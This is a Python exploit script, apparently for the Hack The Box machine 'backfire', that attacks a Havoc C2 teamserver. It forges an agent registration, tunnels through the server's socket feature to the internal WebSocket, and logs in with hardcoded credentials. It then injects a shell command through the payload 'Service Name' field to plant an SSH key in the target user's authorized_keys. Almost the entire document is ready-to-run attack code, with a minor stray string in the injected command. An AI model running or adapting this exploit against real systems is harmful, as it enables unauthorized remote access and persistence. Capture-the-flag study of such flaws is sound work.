README.md
Rendering markdown...
import os
import json
import random
import string
import binascii
import requests
import urllib3
import subprocess
from hashlib import sha3_256
from Crypto.Cipher import AES
from Crypto.Util import Counter
# Disable SSL warnings (not recommended for production)
urllib3.disable_warnings()
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
# Constants and configurations
TEAMSRV_URL = "https://backfire.htb"
HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)"}
C2_USER = "ilya"
C2_PASS_RAW = "CobaltStr1keSuckz!"
C2_PASS_HASH = sha3_256(C2_PASS_RAW.encode()).hexdigest()
MAGIC_COOKIE = b"\xde\xad\xbe\xef"
AES_KEY = b"\x00" * 32
AES_IV = b"\x00" * 16
AGENT_ID = random.randint(100000, 999999).to_bytes(4, "big")
HOSTNAME = b"DESKTOP-ASDF123"
USERNAME = b"Administrator"
DOMAIN_NAME = b"ECORP"
INTERNAL_IP = b"127.0.0.1"
PROCESS_NAME = "msedge.exe".encode("utf-16le")
PROCESS_ID = random.randint(1000, 5000).to_bytes(4, "big")
SOCK_ID = b"\x11\x11\x11\x11"
SOCK_IP = "127.0.0.1"
SOCK_PORT = 40056
SSH_KEYFILE = "key"
# Logging functions
def log_info(message):
print(f"[INFO] {message}")
def log_error(message):
print(f"[ERROR] {message}")
# Padding AES key to ensure it is 32 bytes
def pad_key(k: bytes) -> bytes:
"""Ensures the AES key is exactly 32 bytes."""
return k + b"0" * (32 - len(k)) if len(k) < 32 else k
# AES CTR mode encryption
def aes_ctr_encrypt(k: bytes, iv: bytes, data: bytes) -> bytes:
ctr = Counter.new(128, initial_value=int(binascii.hexlify(iv), 16))
return AES.new(pad_key(k), AES.MODE_CTR, counter=ctr).encrypt(data)
# AES CTR mode decryption
def aes_ctr_decrypt(k: bytes, iv: bytes, data: bytes) -> bytes:
ctr = Counter.new(128, initial_value=int(binascii.hexlify(iv), 16))
return AES.new(pad_key(k), AES.MODE_CTR, counter=ctr).decrypt(data)
# Integer to big-endian bytes
def i2b(v: int, length: int = 4) -> bytes:
"""Integer to big-endian bytes."""
return v.to_bytes(length, "big")
# Send a POST request
def post_data(packet: bytes) -> requests.Response:
"""Send a POST request to TEAMSRV_URL with the given packet."""
try:
r = requests.post(TEAMSRV_URL, data=packet, headers=HEADERS, verify=False)
return r
except requests.RequestException as e:
log_error(f"POST request failed: {e}")
class DummyResponse:
status_code = 0
content = b""
return DummyResponse()
# Generate an SSH key if it doesn't exist, return public key contents
def create_ssh_key() -> str:
"""Generate an SSH key if it doesn't exist, return public key contents."""
if not os.path.exists(SSH_KEYFILE):
log_info("Generating SSH key...")
cmd = ["ssh-keygen", "-t", "ed25519", "-C", SSH_KEYFILE, "-f", SSH_KEYFILE, "-q", "-N", ""]
try:
subprocess.run(cmd, check=True)
os.chmod(SSH_KEYFILE, 0o600)
except (subprocess.CalledProcessError, FileNotFoundError) as e:
log_error(f"SSH key generation failed: {e}")
return ""
pubfile = SSH_KEYFILE + ".pub"
if os.path.exists(pubfile):
return open(pubfile, "r").read().strip()
return ""
# Build a masked WebSocket frame for the given message
def build_websocket_frame(msg: str) -> bytes:
"""Build a masked WebSocket frame for the given message."""
payload = msg.encode("utf-8")
first_byte = 0x81 # text frame
mask_bit = 0x80
length = len(payload)
# Encode the payload length
if length <= 125:
header = bytes([first_byte, mask_bit | length])
elif length <= 65535:
header = bytes([first_byte, mask_bit | 126]) + length.to_bytes(2, "big")
else:
header = bytes([first_byte, mask_bit | 127]) + length.to_bytes(8, "big")
# Random mask
mask = os.urandom(4)
masked_payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
return header + mask + masked_payload
# Send a packet with optional AES-CTR encryption
def send_packet(cmd: bytes, rid: bytes, body: bytes, desc: str, encrypt=True) -> None:
"""
Construct a packet with optional AES-CTR encryption and send it.
Logs success/fail status for the given desc.
"""
if encrypt:
# Encrypt length + body
enc = aes_ctr_encrypt(AES_KEY, AES_IV, i2b(len(body) + 4) + body)
pkt = i2b(12 + len(enc)) + MAGIC_COOKIE + AGENT_ID + cmd + rid + enc
else:
pkt = i2b(12 + len(body)) + MAGIC_COOKIE + AGENT_ID + body
r = post_data(pkt)
if r.status_code == 200:
log_info(f"{desc} => OK")
elif r.status_code == 404:
log_info("You have pawned it!")
else:
log_error(f"{desc} => FAIL ({r.status_code})")
# Register agent
def step_register_agent():
log_info("Registering agent...")
cmd_id = b"\x00\x00\x00\x63"
req_id = b"\x00\x00\x00\x01"
extra = b"\xab" * 100
body = (
cmd_id
+ req_id
+ AES_KEY
+ AES_IV
+ AGENT_ID
+ i2b(len(HOSTNAME))
+ HOSTNAME
+ i2b(len(USERNAME))
+ USERNAME
+ i2b(len(DOMAIN_NAME))
+ DOMAIN_NAME
+ i2b(len(INTERNAL_IP))
+ INTERNAL_IP
+ i2b(len(PROCESS_NAME) - 6)
+ PROCESS_NAME
+ PROCESS_ID
+ extra
)
send_packet(b"", b"", body, "Register Agent", encrypt=False)
# Open socket on the teamserver
def step_open_socket():
log_info("Opening socket on the teamserver...")
cmd = b"\x00\x00\x09\xec"
rid = b"\x00\x00\x00\x02"
sub = b"\x00\x00\x00\x10"
la = b"\x22\x22\x22\x22"
lp = b"\x33\x33\x33\x33"
rev_ip = b"".join(int(x).to_bytes(1, "big") for x in SOCK_IP.split(".")[::-1])
fwd_port = i2b(SOCK_PORT)
body = sub + SOCK_ID + la + lp + rev_ip + fwd_port
send_packet(cmd, rid, body, "Open Socket")
# Write data to the socket
def step_write_socket(data_bytes: bytes, desc: str, subcmd: bytes = b"\x00\x00\x00\x11"):
"""
Write data to the socket. You can customize subcmd if needed.
"""
cmd = b"\x00\x00\x09\xec"
rid = b"\x00\x00\x00\x08"
st = b"\x00\x00\x00\x03"
scs = b"\x00\x00\x00\x01"
body = subcmd + SOCK_ID + st + scs + i2b(len(data_bytes)) + data_bytes
send_packet(cmd, rid, body, desc)
# Read data from the socket and decrypt it
def step_read_socket() -> bytes:
"""Read data from the socket, decrypt, and return it."""
log_info("Reading response from socket...")
cmd = b"\x00\x00\x00\x01"
rid = b"\x00\x00\x00\x09"
pkt = i2b(12 + len(cmd + rid)) + MAGIC_COOKIE + AGENT_ID + cmd + rid
r = post_data(pkt)
if r.status_code != 200:
log_error(f"Read from Socket => FAIL ({r.status_code})")
return b""
log_info("Read from Socket => OK")
dec = aes_ctr_decrypt(AES_KEY, AES_IV, r.content[12:])
return dec[12:]
# Main script execution
ssh_pub = create_ssh_key()
if not ssh_pub:
log_error("No SSH public key found or could not be generated.")
raise SystemExit
step_register_agent()
step_open_socket()
handshake_req = (
b"GET /havoc/ HTTP/1.1\r\n"
b"Host: 127.0.0.1:40056\r\n"
b"Upgrade: websocket\r\n"
b"Sec-WebSocket-Key: h/TPDav2VwnJVqKeDYxRgQ==\r\n"
b"Sec-WebSocket-Version: 13\r\n"
b"Connection: Upgrade\r\n\r\n"
)
step_write_socket(handshake_req, "WebSocket Handshake")
auth_payload = {
"Body": {"Info": {"Password": C2_PASS_HASH, "User": C2_USER}, "SubEvent": 3},
"Head": {"Event": 1, "OneTime": "", "Time": "18:40:17", "User": C2_USER},
}
step_write_socket(build_websocket_frame(json.dumps(auth_payload)), "Authenticate C2")
rnd_listener = "".join(
random.choice(string.ascii_lowercase + string.digits) for _ in range(16)
)
rnd_port = random.randint(1024, 65535)
listener_info = {
"Body": {
"Info": {
"Headers": "",
"HostBind": "0.0.0.0",
"HostHeader": "",
"HostRotation": "round-robin",
"Hosts": "0.0.0.0",
"Name": rnd_listener,
"PortBind": str(rnd_port),
"PortConn": str(rnd_port),
"Protocol": "Https",
"Proxy Enabled": "false",
"Secure": "true",
"Status": "online",
"Uris": "",
"UserAgent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
},
"SubEvent": 1,
},
"Head": {"Event": 2, "OneTime": "", "Time": "00:00:00", "User": C2_USER},
}
step_write_socket(build_websocket_frame(json.dumps(listener_info)), "Create Listener")
cmd_injection = (
"mkdir -p /home/ilya/.ssh && "
f"echo '{ssh_pub}' >> /home/ilya/.ssh/authorized_keys && "
"chmod 700 /home/ilya/.ssh && chmod 600 /home/ilya/.ssh/authorized_keys"
"Run script"
)
injection_svc = f' \\\\\\" -mbla; {cmd_injection} && false #'
final_json = {
"Body": {
"Info": {
"AgentType": "Demon",
"Arch": "x64",
"Listener": rnd_listener,
"Config": (
"{\n"
' "Amsi/Etw Patch": "None",\n'
' "Indirect Syscall": false,\n'
' "Injection": {\n'
' "Alloc": "Native/Syscall",\n'
' "Execute": "Native/Syscall",\n'
' "Spawn32": "C:\\\\Windows\\\\SysWOW64\\\\notepad.exe",\n'
' "Spawn64": "C:\\\\Windows\\\\System32\\\\notepad.exe"\n'
" },\n"
' "Jitter": "0",\n'
' "Proxy Loading": "None (LdrLoadDll)",\n'
f' "Service Name":"{injection_svc}",\n'
' "Sleep": "2",\n'
' "Sleep Jmp Gadget": "None",\n'
' "Sleep Technique": "WaitForSingleObjectEx",\n'
' "Stack Duplication": false\n'
"}"
),
"Format": "Windows Service Exe",
},
"SubEvent": 2,
},
"Head": {"Event": 5, "OneTime": "true", "Time": "18:39:04", "User": C2_USER},
}
step_write_socket(build_websocket_frame(json.dumps(final_json)), "Inject SSH Key")
resp = step_read_socket()
if resp:
log_info("[Teamserver Final Response]\n" + resp.decode("utf-8", errors="ignore"))
print("\033[1;32m\n~~~~~Exploit complete!~~~~~\033[0m")
print("You can now SSH into the target via:")
print(f"\033[1;93mssh -i {SSH_KEYFILE} [email protected]\033[0m")
print("\033[1;31m\n~~~~~Pawned!~~~~~\033[0m")
else:
log_error("[Teamserver Final Response]\n" + (resp.decode("utf-8", errors="ignore") if resp else "No response"))